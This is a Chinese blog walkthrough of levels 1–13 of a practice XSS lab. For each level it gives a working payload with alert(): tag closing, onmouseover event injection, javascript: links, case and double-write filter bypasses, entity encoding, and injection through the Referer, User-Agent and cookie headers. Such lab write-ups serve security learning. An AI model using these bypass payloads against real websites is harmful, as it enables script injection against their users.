xss-challenge(挑战之旅1~13)

最新推荐文章于 2025-08-12 13:18:45 发布
最新推荐文章于 2025-08-12 13:18:45 发布
阅读量430 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: xss 前端 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55404107/article/details/127445780
本文介绍了作者在一系列XSS挑战中的历程,从level1到level13,详细讲解了每个级别的解决方案。通过输入不同的超级无敌xss代码,观察过滤规则,利用事件注入、大小写转换、ASCII编码等技巧绕过过滤机制。挑战涉及了对标签、属性、协议的理解和利用,展示了XSS攻击的各种策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

好小子!开始我们的XSS挑战之旅吧!

在这里插入图片描述

超级无敌xss代码

<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

可以使用hackbar,也可以直接在URL的name上输入超级无敌代码,进行观察过滤了哪些字母或字符。可以使用下面两种方法观察

  • 查看源代码(Ctrl+F4)
  • 查看文档目录树(F12)
level1:

点开图片发现,直接欢迎用户test1,

在这里插入图片描述

  • 按F12,打开backbar

在这里插入图片描述

  • 使用超级无敌代码进行观察

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

    在这里插入图片描述

    在这里插入图片描述

  • 可以看到,代码并没有被过滤掉

  • 输入

  • <script>alert(/xss/)</script>

    在这里插入图片描述

    在这里插入图片描述

  • 点击确认,下一关

level2:

在这里插入图片描述

  • 使用超级无敌xss代码

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

    在这里插入图片描述

    在这里插入图片描述

  • 闭合标签,输入以下xss代码

  • "><script>alert(/xss/)</script>

  • 在这里插入图片描述

level3:

在这里插入图片描述

  • 超级无敌的xss代码代码走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

-在这里插入图片描述

  • 可以看到,“<” 被转换成了 比较操作符。换个思路,构造响应事件进行注入

  • 在这里插入图片描述

    在这里插入图片描述

  • ’onmouseover='alert(/xss/)'#发现多了一个单引号,无法闭合
'onmouseover='alert(/xss/)#写完后,没有反应,需要将鼠标移到代码框。即可过关。onmouseover就是鼠标移动响应事件

  • 在这里插入图片描述

level4:

在这里插入图片描述

  • 很好,继续加油!超级无敌xss代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • 在这里插入图片描述

  • 继续使用onmouseover,鼠标响应事件

  • ’onmouseover='alert(/xss/)'#观察发现,是双引号。修改成双引号
"onmouseover="alert(/xss/)

  • 在这里插入图片描述

  • 将鼠标划到搜索框进行鼠标移动响应事件

    在这里插入图片描述

level5:

在这里插入图片描述

  • xss超级代码走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • 在这里插入图片描述

  • script和on都有下划线,href和“<"没有被过滤,使用伪协议

  • "><a href='javascript:alert(/xss/)'>click me!</a>#点我

  • 在这里插入图片描述

level6:

  • 使用超级无敌xss代码

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • 在这里插入图片描述

    在这里插入图片描述

  • 观察得出大小写没有被过滤,可以试试新思路。就决定是你了,大小写

  • "><scRscript>alert(/xss/)</ScRipt>

  • 在这里插入图片描述

level7:

在这里插入图片描述

  • 宇宙超级无敌xss实验代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • 在这里插入图片描述

  • on、script、<、都被过滤。非常好!可以使用大小写加双写了

  • "><ScRscriptiPt>alert(/xss/)</ScscriptRiPt>

  • 在这里插入图片描述

level8:

在这里插入图片描述

  • 每次都要来一次,超级无敌宇宙第一xss代码,走起!

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • 在这里插入图片描述

  • 发现实验的代码只有href能用,但是在下面的红框中,表示href有下划线,且代码书写在友情连接里,代码写完后,点击友情连接进行跳转。使用伪协议,进行ASCII编码

  • 在这里插入图片描述

    level9:

    在这里插入图片描述

    • 宇宙无敌超级xss代码走起

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

    • 竟然显示不合法

    -在这里插入图片描述

    • 使用http://www.baidu.com看看会出现什么

    -在这里插入图片描述

    • 哦豁,竟然合法,猜测是不是需要加“http://”

    • &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://')

    • 在这里插入图片描述

    level10:

    在这里插入图片描述

    • 最强宇宙无敌xss代码走起

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

    • 在这里插入图片描述

    • 没有找到。发现下面有三个t_link、t_history、t_sort。在hackbar里面给这三个进行赋值

    • t_sort="onmouseover="alert(/xss/)" #发现只有t_sort能够插入

    • 在这里插入图片描述

    • 但是type的属性是hidden,进行修改。完整代码

    • t_sort="onmouseover="alert(/xss/)" type="text"

    • 在这里插入图片描述

    level11:

    在这里插入图片描述

    • 太阳系最强xss代码

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

    • 在这里插入图片描述

    • 和第十关一样,根据经验,这个t_ref,应该是Referer。使用hackbar,勾选Referer,在Referer框里填写一下代码

    • "onmouseover="alert(/xss/)" type="text"

    • 在这里插入图片描述

    • 在这里插入图片描述

    level12:

    在这里插入图片描述

  • 最强宇宙代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

-在这里插入图片描述

  • t_ua应该是User-Agent,使用hackbar,注入以下鼠标响应事件

  • "onmouseover="alert(/xss/)" type="text"

  • 在这里插入图片描述

  • 在这里插入图片描述

level13:

在这里插入图片描述

  • 宇宙最强xss代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

  • t_cook 应该是cookie值,使用hackbar,注入以下代码

  • t_cook="onmouseover="alert(/xss/)" type="text"

  • 在这里插入图片描述

-在这里插入图片描述

level14:

在这里插入图片描述

  • 未完待续…
    `
xss labs 挑战之旅
lemonwei
06-05 851
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一关,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二关进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
靶场通关-XSS挑战之旅1-5)
m0_56634355的博客
06-04 1651
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
xss挑战之旅
m0_71326960的博客
03-16 409
使用docker搭建xss挑战之旅运行环境,xss挑战之旅level1-level3
XSS挑战之旅
weixin_41182861的博客
09-26 2127
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
XSS挑战之旅10-18)
老司机开代码的博客
08-31 739
文章目录第十关第十一关第十二关第十三关第十四关第十五关第十六关第十七关第十八关 第十关 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 1024
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2784
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
xss挑战之旅11关到13关,操作步骤配截图。
jzzer447的博客
04-15 673
level11 分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。 头部本身没有Referer,自行添加了 payload:Referer:" onmouseover=alert(11) type="text" Referer:" onclick="alert(11)" type="text level12...
XSS挑战之旅Level(1-5)
m0_52701599的博客
03-10 515
XSS挑战之旅Level(1-7)详细步骤
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS学习-XSS挑战之旅()
Lemon's blog
07-24 643
前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识。 第十一关
XSS挑战之旅1-10关
weixin_52116519的博客
11-15 1650
XSS漏洞介绍。
xss挑战之旅学习笔记
weixin_44300286的博客
06-07 520
前言:前几天学了xss攻击,觉得有必要写一篇博客记录一下。
XSS闯关挑战
weixin_34417200的博客
05-15 261
XSS跨站*** 本文参考公众号07v8论安全 XSS***全称跨站脚本***,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS***分成两类1、一类是来自内部的***,主要指的是利用程序自身的漏洞,构造跨站语句。2、另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页...
xss挑战之旅level 1 - level 4
Miss的博客
04-20 351
Level 1: 观察url中的?name参数,向网站提交数据,然后返回到页面上。 <script>alert(1)</script> Level 2: 第二关是可以在输入框中输入一个数据提交给服务器,然后提交的数据是会被显示到页面上的。此时再使用第一关的payload已经是不行了。看一下源码: 在这里,提交的scirpt被当作页面的内容和value的值处理了,因此没有形成html结构被浏览器执行。尝试一下闭合value,然后构造一个script标签进去。在输入框中输入以下代
我的XSS挑战之旅
Atkx's Blog
08-08 635
XSS挑战之旅 Level 1 发现参数name的内容是一个注入点,并且没有任何过滤 payload:?name=test<script>alert('xss')</script> Level 2 和第一关差不多,在搜索框中输入 <script>alert('xxs')</script> 没有出现弹窗 查看一下源代码 需要把前面的<input>标签给闭合掉 在搜索框中输入 "><script>alert('xxs'
XSS挑战赛记录
卧龙居
06-14 1600
比赛网址:http://prompt.ml/0 第一题: 需要无交互的触发JS脚本的执行。代码如下: ">
XSS挑战
夜思红尘的博客
06-18 527
这里是有关于xss靶场的练习,是一个很常见的靶场。大家前来阅读!!
网站测评-利用缓存机制实现XSS的分步测试方法
最新发布
2503_92839163的博客
08-12 224
浏览器缓存机制有可能存下恶意脚本。做分步测试,第一步就是识别缓存响应头里的各个字段。得检查 Cache-Control 指令配置对不对,看看 ETag 值里有没有包含用户输入的内容。分步测试的方法,要求精确控制 HTTP 请求的顺序。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值